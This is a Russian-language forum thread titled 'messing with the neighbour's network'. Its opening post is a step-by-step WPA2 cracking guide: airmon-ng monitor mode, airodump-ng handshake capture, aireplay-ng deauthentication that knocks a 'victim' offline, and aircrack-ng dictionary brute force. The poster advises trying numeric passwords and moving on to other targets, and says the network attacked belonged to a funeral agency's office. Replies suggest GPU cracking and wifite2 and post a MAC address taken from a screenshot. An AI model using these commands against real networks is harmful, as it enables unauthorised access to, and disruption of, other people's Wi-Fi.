Хулиганим с сетью соседа

sleepwalker_user

Пассажир
Сообщения
17
Реакции
15
Оборудование: ноутбук с установленной операционной системой «Kali Linux/ Parrot Security OS», внешний WiFi-адаптер «Alfa AWUS036NHA» + направленная антенна.

Взлом WPA2 (Handshake):



1. iwconfig - Определение названия WiFi-адаптера (в моём случае это - wlx00c0ca982c7d. Чтобы на 100% быть уверенным, вытащите usb кабель WiFi-адаптера из разъёма и повторите ту же команду, если какой-либо из адаптеров исчез из списка, значит это именно он. Затем снова подключите WiFi-адаптер и продолжайте следовать инструкциям).
587_original.png

2. airmon-ng check kill - Убить все лишние процессы WiFi-адаптера
996_original.png

3. airmon-ng start wlx00c0ca982c7d - Включить режим монитора (при повторном введении команды "iwconfig", в выводе появится "wlan0mon", это означает, что WiFi-адаптер теперь будет работать в режиме мониторинга пакетов)
1233_original.png

4. airodump-ng wlan0mon - Сканирование сетей
1348_original.png

1647_original.png

1855_original.png

2271_original.png

5. airodump-ng --bssid MAC_ТОЧКИ_ДОСТУПА --channel КАНАЛ_ТОЧКИ_ДОСТУПА -w ПУТЬ_К_ПАПКЕ_ДЛЯ_СОХРАНЕНИЯ_HANDSHAKE wlan0mon
2374_original.png

2808_original.png

6. Открыть новую вкладку в терминале и ввести команду (предыдущую вкладку не закрывать): aireplay-ng --deauth 30 -a MAC_ТОЧКИ_ДОСТУПА -c MAC_КЛИЕНТСКОГО_УСТРОЙСТВА wlan0mon - Отправка пакетов деавторизации (принудительное отключение жертвы от WiFi), "HandShake" будет перехвачен автоматически и появится в папке которую мы указывали ранее.
2970_original.png

7. После перехвата т.н. "HandShake" в папке окажется много файлов, но нам нужны лишь те, что с расширением ".cap"
3084_original.png

8. wpaclean ПУТЬ_К_ФАЙЛУ_ДЛЯ_СОХРАНЕНИЯ_ОЧИЩЕННОГО_HANDSHAKE.cap ПУТЬ_К_ИСХОДНОМУ_ФАЙЛУ_HANDSHAKE.cap
3415_original.png

9. Для дальнейших манипуляций потребуется словарь для брутфорса файла "HandShake", можно скачать готовый словарь из сети (Github, по запросу: "Password Dictionary"), а можно создать свой, заточенный под вашу цель, существуют специальные утилиты (всё это найти можно на Github). По личному опыту могу сказать что у подавляющего большинства юзеров пароли от WiFi состоят лишь из чисел (номера телефонов, даты рождений - различные вариации), при этом в минимально необходимое кол-во символов (8), если вы прошлись по числовому словарю брутфорсом и ничего не получили - бросайте эту затею и пробуйте ломать другой (берите количеством, нет смысла колупать один на протяжении недели, "Время - золото").



10. aircrack-ng -w ПУТЬ_К_СЛОВАРЮ -b MAC_ТОЧКИ_ДОСТУПА ПУТЬ_К_ОЧИЩЕННОММУ_HANDSHAKE.cap
3623_original.png

3956_original.png

11. И, о чудо, результате всех этих действий: "KEY FOUND! [ 001122334455 ]"
 
  • Истец Ответчик
  • #2
Ничего не понял!
 
Ничего не понял!
Это самый банальный перехват хендшейка(шифрованный пасс сети) с помощью мониторинга вай-фай частот. Школьники делают)
Ты отключаешь юзера от сети, присылая ему deauth и при подключении его вновь ловишь этот пакет.

Далее надо брутфорсом его перебрать по словарю например. Только таким методом как тут, ты будешь его 300 лет перебирать,если сложный пасс. Лучше всего через графическую карту.

Погугли, есть в сети куча более полезной инфы по теме с обьяснениями.
 
гуд
Это самый банальный перехват хендшейка(шифрованный пасс сети) с помощью мониторинга вай-фай частот. Школьники делают)
Ты отключаешь юзера от сети, присылая ему deauth и при подключении его вновь ловишь этот пакет.

Далее надо брутфорсом его перебрать по словарю например. Только таким методом как тут, ты будешь его 300 лет перебирать,если сложный пасс. Лучше всего через графическую карту.

Погугли, есть в сети куча более полезной инфы по теме с обьяснениями.
 
Это самый банальный перехват хендшейка(шифрованный пасс сети) с помощью мониторинга вай-фай частот. Школьники делают)
Ты отключаешь юзера от сети, присылая ему deauth и при подключении его вновь ловишь этот пакет.

Далее надо брутфорсом его перебрать по словарю например. Только таким методом как тут, ты будешь его 300 лет перебирать,если сложный пасс. Лучше всего через графическую карту.

Погугли, есть в сети куча более полезной инфы по теме с обьяснениями.
Если не разбираешься можешь заюзать пакет wifite2, эта утилита на питоне максимально упрощена и делает все тоже самое
 
Кстати автор спалил адрес сетевой карты, которую снифил. Умора. Зачем ток затирал везде. Не удивлюсь, если это еще его домашняя сеть:D

Снимок экрана от 2024-02-22 21-24-57.png


DE:2C:6E:F8:A8:0D
 
Оборудование: ноутбук с установленной операционной системой «Kali Linux/ Parrot Security OS», внешний WiFi-адаптер «Alfa AWUS036NHA» + направленная антенна.

Взлом WPA2 (Handshake):



1. iwconfig - Определение названия WiFi-адаптера (в моём случае это - wlx00c0ca982c7d. Чтобы на 100% быть уверенным, вытащите usb кабель WiFi-адаптера из разъёма и повторите ту же команду, если какой-либо из адаптеров исчез из списка, значит это именно он. Затем снова подключите WiFi-адаптер и продолжайте следовать инструкциям).
Посмотреть вложение 1444722
2. airmon-ng check kill - Убить все лишние процессы WiFi-адаптера
Посмотреть вложение 1444723
3. airmon-ng start wlx00c0ca982c7d - Включить режим монитора (при повторном введении команды "iwconfig", в выводе появится "wlan0mon", это означает, что WiFi-адаптер теперь будет работать в режиме мониторинга пакетов)
Посмотреть вложение 1444724
4. airodump-ng wlan0mon - Сканирование сетей
Посмотреть вложение 1444725
Посмотреть вложение 1444726
Посмотреть вложение 1444727
Посмотреть вложение 1444728
5. airodump-ng --bssid MAC_ТОЧКИ_ДОСТУПА --channel КАНАЛ_ТОЧКИ_ДОСТУПА -w ПУТЬ_К_ПАПКЕ_ДЛЯ_СОХРАНЕНИЯ_HANDSHAKE wlan0mon
Посмотреть вложение 1444729
Посмотреть вложение 1444730
6. Открыть новую вкладку в терминале и ввести команду (предыдущую вкладку не закрывать): aireplay-ng --deauth 30 -a MAC_ТОЧКИ_ДОСТУПА -c MAC_КЛИЕНТСКОГО_УСТРОЙСТВА wlan0mon - Отправка пакетов деавторизации (принудительное отключение жертвы от WiFi), "HandShake" будет перехвачен автоматически и появится в папке которую мы указывали ранее.
Посмотреть вложение 1444731
7. После перехвата т.н. "HandShake" в папке окажется много файлов, но нам нужны лишь те, что с расширением ".cap"
Посмотреть вложение 1444732
8. wpaclean ПУТЬ_К_ФАЙЛУ_ДЛЯ_СОХРАНЕНИЯ_ОЧИЩЕННОГО_HANDSHAKE.cap ПУТЬ_К_ИСХОДНОМУ_ФАЙЛУ_HANDSHAKE.capПосмотреть вложение 1444733
9. Для дальнейших манипуляций потребуется словарь для брутфорса файла "HandShake", можно скачать готовый словарь из сети (Github, по запросу: "Password Dictionary"), а можно создать свой, заточенный под вашу цель, существуют специальные утилиты (всё это найти можно на Github). По личному опыту могу сказать что у подавляющего большинства юзеров пароли от WiFi состоят лишь из чисел (номера телефонов, даты рождений - различные вариации), при этом в минимально необходимое кол-во символов (8), если вы прошлись по числовому словарю брутфорсом и ничего не получили - бросайте эту затею и пробуйте ломать другой (берите количеством, нет смысла колупать один на протяжении недели, "Время - золото").



10. aircrack-ng -w ПУТЬ_К_СЛОВАРЮ -b MAC_ТОЧКИ_ДОСТУПА ПУТЬ_К_ОЧИЩЕННОММУ_HANDSHAKE.cap
Посмотреть вложение 1444738
Посмотреть вложение 1444740
11. И, о чудо, результате всех этих действий: "KEY FOUND! [ 001122334455 ]"
ничего не понятно, но очень интересно))))
 
Если не разбираешься можешь заюзать пакет wifite2, эта утилита на питоне максимально упрощена и делает все тоже самое
Круто, как долго ты этому учился, расскажи, интересно.
Сообщение обновлено:

Это офис одного похоронного агенства, я не шучу.
Сообщение обновлено:

И, да, на видеокарте хендшейк расшифровывается в разы быстрее, как уже выше упомянул мой ассистент. Не показал данный момент по определённым причинам (отсутствие необходимого железа).
Сообщение обновлено:

Кстати автор спалил адрес сетевой карты, которую снифил. Умора. Зачем ток затирал везде. Не удивлюсь, если это еще его домашняя сеть:D

Посмотреть вложение 1448527

DE:2C:6E:F8:A8:0D
Рановато мне ещё, чтоб эта сеть была моей "домашней", батенька. Батенька, и вам не хворать, батенька.
 
Последнее редактирование:
Работает со всеми провайдерами и роутерами?
 

Похожие темы

Итак, после того, как мы научились мониторить подключённые устройства к чужому роутеру, возникает резонный вопрос: чем бы нам ещё напакостить тому самому Витьку из 666 квартиры? А вот чем: отключим все устройства от интернета до тех пор, пока Витёк не осознает свою ошибку и не приползёт на...
Ответы
11
Просмотры
836
LINUX не всем по зубам, но причастным к даркнету следует сделать невозможное и пересесть на эту ОС, выбрав дистрибутив по душе, поверьте - будет проще, чем кажется на первый взгляд. Есть тип атак который не доступен из windows и поэтому нам нужно подготовить одну из сборок заточенных под...
Ответы
32
Просмотры
Die Cyber Wochenschau 2 - взлом WEP - разбор реальной ezpz атаки. Взять WEP точку ненамного престижней, чем украсть пароль "лоховоровайкой" - атакой EVIL TWIN. Но ради интереса и опыта я сегодня с утреца решил таки проверить так ли все там просто. На все про все ушло чуть более 30 минут, из...
Ответы
2
Просмотры
Die Deutsche Cyber Wochenschau - взлом WPA/WPA2 PSK через уязвимость WPS - разбор реальной атаки. Взлом роутера как известно возможно реализовать тремя основными стратегиями: 1. Через брутфорс или атаку по словарю 4-way-handshake 2. Через брутфорс пина Wifi Protected Setup (WPS) 3. Через лоха...
Ответы
18
Просмотры
18К
Взлом WPA/WPA2 PSK. Часть первая: захват WPA/WPA2 four-way-handshake. Один из способов взлома беспроводной точки доступа WPA/WPA2 PSK является офф-лайн атака по словарю захваченного four-way-handshake, или "рукопожатие". Что такое four-way-handshake - тема для отдельной стататьи, для наших...
Ответы
21
Просмотры
18К
Назад
Сверху Снизу